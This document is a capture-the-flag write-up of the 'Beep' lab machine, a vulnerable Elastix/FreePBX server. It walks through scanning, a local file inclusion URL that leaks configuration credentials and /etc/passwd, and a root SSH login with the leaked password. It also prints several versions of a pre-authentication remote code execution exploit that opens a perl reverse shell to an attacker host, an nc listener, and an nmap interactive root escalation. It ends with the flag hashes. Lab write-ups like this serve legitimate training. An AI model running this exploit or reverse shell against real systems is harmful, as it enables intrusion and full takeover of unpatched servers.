Beep

ip:

10.10.10.7

nmap results

Open 10.10.10.7:22
Open 10.10.10.7:25
Open 10.10.10.7:80
Open 10.10.10.7:111
Open 10.10.10.7:110
Open 10.10.10.7:143
Open 10.10.10.7:443
Open 10.10.10.7:10000

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 adee5abb6937fb27afb83072a0f96f53 (DSA)
|_  2048 bcc6735913a18a4b550750f6651d6d0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to [https://10.10.10.7/](https://10.10.10.7/)
110/tcp   open  pop3?
|*pop3-capabilities: USER IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE RESP-CODES TOP UIDL PIPELINING APOP STLS LOGIN-DELAY(0) EXPIRE(NEVER)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            882/udp   status
|*  100024  1            885/tcp   status
143/tcp   open  imap?
|_imap-capabilities: NO Completed MULTIAPPEND UNSELECT STARTTLS ACL OK ID ANNOTATEMORE QUOTA LITERAL+ URLAUTHA0001 IDLE X-NETSCAPE THREAD=REFERENCES LISTEXT CONDSTORE CATENATE UIDPLUS LIST-SUBSCRIBED NAMESPACE IMAP4rev1 SORT=MODSEQ RENAME SORT RIGHTS=kxte BINARY ATOMIC CHILDREN THREAD=ORDEREDSUBJECT IMAP4 MAILBOX-REFERRALS

443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))

|*ssl-date: 2023-07-28T17:25:29+00:00; +1s from scanner time.
| http-robots.txt: 1 disallowed entry
|*/
|_http-server-header: Apache/2.2.3 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_http-title: Elastix - Login page

993/tcp   open  imaps?
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3s?
3306/tcp  open  mysql?
4445/tcp  open  upnotifyp?

10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1

Elastix version: `Elastix version 0.5`

Finding vuln:

searchsploit elastix

found multiple vuln

Solution 1 - LFI

searchsploit -m php/webapps/37637.pl

found an endpoint that is vulnerable to lfi.

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf&module=Accounts&action

found multiple creds.

AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE

#FOPRUN=true
FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE

user

asterisk
asteriskuser
admin
root

pass

jEhdIekWmdjE
amp109
passw0rd
amp111

So I’ve got bunch of user and pass.

now what?

try these creds in those login page.
try to connect over ssh
- brute force
- ssh

but let’s see which are the users here by /etc/passwd . it will narrow the attack surface.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.

First thing you should look is that.

if there any root user?
- root:x:0:0:root:/root:/bin/bash
how many users are in there. those have the /bin/bash and /home/user
- fanis:x:501:501::/home/fanis:/bin/bash
- spamfilter:x:500:500::/home/spamfilter:/bin/bash

I tried to do ssh in my linux but it shows error. as the ssh client the box using is outdated and insecure, thats why my machine wasn’t connecting to it,

Solving this issue.

after few research i’ve found this solution.

make a directory at home dir
mkdir -p .ssh
now create a config file.
nano config
paste these things.

Host 10.10.10.7
#Legacy changes
KexAlgorithms +diffie-hellman-group1-sha1,diffie-hellman-group14-sha1
Ciphers +aes128-cbc
HostKeyAlgorithms=+ssh-dss

however you can connect to it using putty.

user: root

pass: jEhdIekWmdjE

and we are in, as a root user.

root: f965360e0d402ce69bbb38566ddd2e8d

user: a290791a786a1bdcc8a59f81b4f3237a

Solution 2

— REMOTE CODE EXECUTION.

The Exploit db data base is too old. So i’ve found a new payload in github.

#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
import urllib
import ssl
rhost="172.16.254.72"
lhost="172.16.254.223"
lport=443
extension="1000"

ssl._create_default_https_context = ssl._create_unverified_context

# Reverse shell payload

url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urllib.urlopen(url)

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

change the lhost according to tun0 and lport and exploit

but i’m getting error.

So i made some changes.

The Python "ModuleNotFoundError: No module named 'urllib2'" occurs because the urllib2 module has been split into urllib.request and urllib.response in Python 3.

To solve the error, import the module as from urllib.request import urlopen.

modified payload

#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
from urllib.request import urlopen
import ssl
rhost="10.10.10.7"
lhost="10.10.16.30"
lport= "4444"
extension="1000"

#ssl._create_default_https_context = ssl._create_unverified_context

# Reverse shell payload

url = 'http://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urlopen(url)

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Again another error.

As the ssl version of the website using is backdated V1. Modern web browser and libraries do not allow to connect to those website using outdated SSL protocol.

Hence I tried to modify script to bypass this ssl check but no luck.

I found a way that Rana Khalil was using, That is redirecting the traffic through burp and burp will forcefully redirect to the following website without SSL check.

And also we can check what’s going on in the background by checking the burp’s traffic.

To do this, on script, change the following

rhost= "localhost"
url = must change https to http

on burp change the following.

go to Proxy > Options > Proxy Listeners > Add. 

In the Binding tab, set the port to 80. 

In the Request handling tab set the Redirect to host parameter to 10.10.10.7, 

Redirect to port parameter to 443 and check the option Force use of SSL.

So our Final Payload will looks like. this.

Final

#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649

############################################################
# Modified by Rahi Islam.
# github: https://github.com/rahisec
############################################################

from urllib.request import urlopen
import ssl
rhost="localhost"
lhost="10.10.16.30"
lport=4444
extension="1000"

ssl._create_default_https_context = ssl._create_unverified_context

# Reverse shell payload

url = 'http://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urlopen(url)

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

Now run it and also add a listener

nc -lnvp 4444

It runs without error this time but still we don’t get the shell.

Let’s check in the burp request, what’s going on…..

The call failed. Maybe we need to change the default extension. As we don’t know which extension this app using . there is a tool which can detect valid extension in PBX. In particular the svwar tool identifies working extension lines on a PBX

Installing Sipvicious

pip install sipvicious

Now run the following command.

sudo sipvicious_svwar -m INVITE -e100-550 10.10.10.7

m: specifies a request method, INVITE
e: specifies an extension or extension range, in our case we set it to 100-550. if we don’t find any we will increase our range.

To be honest, I had to run the tool for several times to get this result. 🙂

I was getting these errors.

Ok. So we get the extension value that was using the app is 233

Final Payload

#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2012
# Author: muts, SSL update by Emporeo
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649

############################################################
# Modified by Rahi Islam.
# github: https://github.com/rahisec
############################################################

from urllib.request import urlopen
import ssl
rhost="localhost"
lhost="10.10.16.30"
lport=4444
extension="233"  #extension has been changed!

ssl._create_default_https_context = ssl._create_unverified_context

# Reverse shell payload

url = 'http://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'

urlopen(url)

# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

And here we go. Finally, We’ve got the initial Shell.

when we visit the webpage, it isn’t loading.

modify the minimum TLS version in Firefox

Open a new tab in Firefox.Enter "about:config" in the address bar and hit Enter/Return.
In the search box located above the list, enter "security.tls.version.min".
Locate the preference with the name "security.tls.version.min" and modify its value to ‘1’

Q.2.

TLS version:

developer tools > network > security

TLSv1

1.0

Q.2

What is the name of the software that's hosting a webserver on 443?

Elastix

The elastix softwere version disclosed.

found lang directory from directory bruteforce. visiting that dir, click on any lang, eg: cn.lang.

and the version is disclosed.

PreviousDevel

Last updated 2 years ago

hashtagElastix version: Elastix version 0.5

hashtagFinding vuln:

hashtagSolution 1 - LFI

hashtagroot: f965360e0d402ce69bbb38566ddd2e8d

hashtaguser: a290791a786a1bdcc8a59f81b4f3237a

hashtagSolution 2

hashtagInstalling Sipvicious

hashtagFinal Payload

hashtagmodify the minimum TLS version in Firefox

hashtagQ.2.

hashtagQ.2